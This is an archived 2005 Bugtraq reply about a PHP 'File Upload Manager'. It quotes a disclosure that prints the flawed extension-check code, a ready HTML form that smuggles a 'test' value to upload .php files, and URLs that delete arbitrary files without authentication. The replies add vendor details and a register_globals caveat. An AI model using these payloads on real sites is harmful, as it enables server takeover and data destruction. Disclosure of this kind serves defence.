lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <285472c905061508352a9c1858@mail.gmail.com>
Date: Wed, 15 Jun 2005 16:35:05 +0100
From: <systemcracker@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: File Upload Manager Sploits


Also, I think this hole only occurs when register_globals is ON. In
the latest version of PHP, this defaults to OFF.

I've alerted the developers to this bug.

> On 6/15/05, systemcracker@...il.com <systemcracker@...il.com> wrote:
> > after some digging on google, I've found that this refers to the "File
> > Upload Manager" at
> > http://www.mtnpeak.net/webdev/index.php?pg=php
> > rather than any number of other File Upload Managers. It's a common
> > name, please include a url or at least vendor name in future.
> >
> > On 12 Jun 2005 22:22:45 -0000, blackshoe@...il.com <blackshoe@...il.com> wrote:
> > > Below is some code for a recent unpatched exploit for file managers using php as the base code. Share this with the world and help protect.
> > >
> > > File Upload Manager - Bypass File Extension and Arbitrary File Delete
> > > nothing to see here @ hackthissite.org
> > >
> > > Through an input validation flaw, users are able to upload files that are not on the approve extension list. This can potentially allow users to upload .php files and gain permissions of the web server to execute commands and scripts.
> > >
> > > The code that checks for invalid file extensions makes use of an uninitialized variable which you can inject values into:
> > >
> > >         for($i=0;$i<count($file_ext_allow);$i++)
> > >                 {
> > >                         if (getlast($fileupload_name)!=$file_ext_allow[$i])
> > >                                 $test.="~~";
> > >                 }
> > >                 $exp=explode("~~",$test);
> > >
> > >                 if (count($exp)==(count($file_ext_allow)+1))
> > >                 { // (do not upload) } else { // (upload) }
> > >
> > > With each mismatch, they add '~~' to the variable 'test' and then compare it to the count of the original valid file extensions array.
> > >
> > > Users can create an html form with an extra form variable 'test' with the value of '~~~~~~' which will allow you to bypass the extension validation:
> > >
> > > <form method="post" enctype="multipart/form-data" action="http://www.asdf.com/url/to/fileuploader/index.php">
> > > file: <input type="file" name="fileupload" class="textfield" size="30">
> > > exxploitz: <input type="text" name="test" class="textfield" size="46" value="~~~~~~">
> > > <input type="submit" value="upload" class="button">
> > > </form>
> > >
> > > Fix: Use php's in_array() function to check to see if an extension is in the valid list.
> > >
> > >
> > > In an unrelated flaw, users are able to delete arbitrary files on the webserver by not checking authentication before passing it to delete functions.
> > >
> > > url to view a file: /index.php?act=view&file=d2VlLnBocC50eHQ=
> > > url to delete the same file: /index.php?act=del&file=d2VlLnBocC50eHQ=
> > >
> > > to choose what file to delete, just do base64_encode("filename");
> > >
> >
> >
> > --
> > Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
> >
> 
> 
> --
> Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
> 


-- 
Computing tools, PHP code, online tools and more at http://www.puremango.co.uk


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ